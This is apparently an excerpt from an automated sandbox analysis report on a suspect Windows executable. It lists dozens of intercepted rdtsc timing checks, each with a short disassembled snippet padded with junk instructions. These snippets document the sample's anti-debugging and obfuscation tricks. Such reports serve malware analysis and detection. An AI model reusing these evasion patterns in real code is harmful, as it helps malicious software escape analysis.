Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 63B053 second address: 63B074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD30Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F909C7BD30Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 64126A second address: 641270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 641270 second address: 641278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 63FD1B second address: 63FD29 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 59DED9 second address: 59DEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 640101 second address: 640105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 640105 second address: 640111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5E9DDA second address: 5E9DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 5E9F61 second address: 5E9FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007F909C7BD319h 0x0000000d push 0000001Eh 0x0000000f add edi, 697F740Fh 0x00000015 add ecx, dword ptr [ebp+122D3568h] 0x0000001b nop 0x0000001c jmp 00007F909C7BD313h 0x00000021 push eax 0x00000022 pushad 0x00000023 jnp 00007F909C7BD308h 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 640FEA second address: 640FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 640FF3 second address: 640FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F909C7BD306h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 64458B second address: 644590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\AaEBZ7icLd.exe RDTSC instruction interceptor: First address: 644B5C second address: 644B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F909C7BD306h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 644CAB second address: 644CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F909CBB351Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 644CBC second address: 644CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F909C7BD306h 0x0000000a popad 0x0000000b jmp 00007F909C7BD310h 0x00000010 pushad 0x00000011 jbe 00007F909C7BD306h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 644CE0 second address: 644CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64D527 second address: 64D53D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD312h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64B633 second address: 64B63B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64B8FB second address: 64B903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64B903 second address: 64B907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64D28E second address: 64D297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 64D297 second address: 64D2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007F909CBB3516h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 651620 second address: 651635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F909C7BD306h 0x0000000f jl 00007F909C7BD306h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65068D second address: 6506A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F909CBB3521h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6506A5 second address: 6506AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650812 second address: 65081C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F909CBB3516h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65081C second address: 650822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650822 second address: 650828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650970 second address: 65097E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F909C7BD30Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65097E second address: 6509A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F909CBB3516h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650B33 second address: 650B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650B39 second address: 650B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650B3F second address: 650B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650B43 second address: 650B51 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650C82 second address: 650C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650C86 second address: 650C99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007F909CBB3516h 0x0000000d pop eax 0x0000000e push esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650C99 second address: 650CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650CA2 second address: 650CA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650CA6 second address: 650CCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD313h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F909C7BD306h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 650F8F second address: 650F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6510EC second address: 6510F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6510F0 second address: 651120 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 ja 00007F909CBB3516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F909CBB351Ch 0x00000011 jns 00007F909CBB351Ch 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F909CBB3516h 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 651120 second address: 65114E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD311h 0x00000007 jmp 00007F909C7BD316h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6512CA second address: 6512D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 655FCF second address: 655FD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 655FD5 second address: 655FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F909CBB3516h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 655FE4 second address: 656000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F909C7BD311h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 656000 second address: 656004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65C09A second address: 65C0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909C7BD30Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65C0AA second address: 65C0C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F909CBB3526h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65C4A4 second address: 65C4A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65C4A8 second address: 65C4B4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F909CBB3516h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65C776 second address: 65C77C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65C77C second address: 65C780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65CA64 second address: 65CA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F909C7BD313h 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65CA81 second address: 65CAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 jl 00007F909CBB3538h 0x0000000c jmp 00007F909CBB351Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F909CBB351Ch 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65CBF8 second address: 65CC02 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F909C7BD306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65DB9E second address: 65DBC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F909CBB3526h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65DBC5 second address: 65DBCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65DBCA second address: 65DBDB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F909CBB351Ch 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65BA35 second address: 65BA41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65BA41 second address: 65BA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F909CBB3516h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65BA4B second address: 65BA55 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F909C7BD306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65BA55 second address: 65BA63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 65BA63 second address: 65BA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 665368 second address: 665387 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F909CBB3525h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 665387 second address: 6653B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F909C7BD306h 0x00000008 jmp 00007F909C7BD30Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007F909C7BD308h 0x00000018 jmp 00007F909C7BD30Fh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 664DDB second address: 664DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 666AEC second address: 666AF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F909C7BD306h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 666AF6 second address: 666B29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB351Eh 0x00000007 jmp 00007F909CBB351Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F909CBB3520h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 666B29 second address: 666B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6762BC second address: 6762D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jnl 00007F909CBB3516h 0x0000000c je 00007F909CBB3516h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 67E598 second address: 67E5AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909C7BD310h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 685CB6 second address: 685CD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F909CBB3528h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 68D60F second address: 68D615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 5A306B second address: 5A3092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F909CBB3520h 0x00000009 popad 0x0000000a push edx 0x0000000b jmp 00007F909CBB351Ah 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 68D480 second address: 68D499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F909C7BD311h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 68D499 second address: 68D49D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6964E1 second address: 696514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F909C7BD30Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F909C7BD314h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 696514 second address: 69651A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6967F1 second address: 6967F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6967F7 second address: 696804 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F909CBB3516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 696AC6 second address: 696AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 696AD1 second address: 696AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F909CBB3525h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 696CB2 second address: 696CD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F909C7BD306h 0x00000009 jmp 00007F909C7BD311h 0x0000000e popad 0x0000000f pushad 0x00000010 js 00007F909C7BD306h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 696CD6 second address: 696CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 696FC7 second address: 696FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6A5F8F second address: 6A5F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6ABB53 second address: 6ABB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6AD45B second address: 6AD460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6AD460 second address: 6AD46A instructions: 0x00000000 rdtsc 0x00000002 je 00007F909C7BD30Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6AD46A second address: 6AD486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 jc 00007F909CBB3516h 0x0000000d pop edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F909CBB351Ah 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\AaEBZ7icLd.exeRDTSC instruction interceptor: First address: 6AD486 second address: 6AD48B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
